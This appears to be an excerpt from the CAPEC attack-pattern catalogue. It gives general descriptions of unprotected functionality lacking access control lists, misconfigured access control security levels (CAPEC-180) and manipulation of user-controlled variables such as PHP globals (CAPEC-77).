In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels

An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.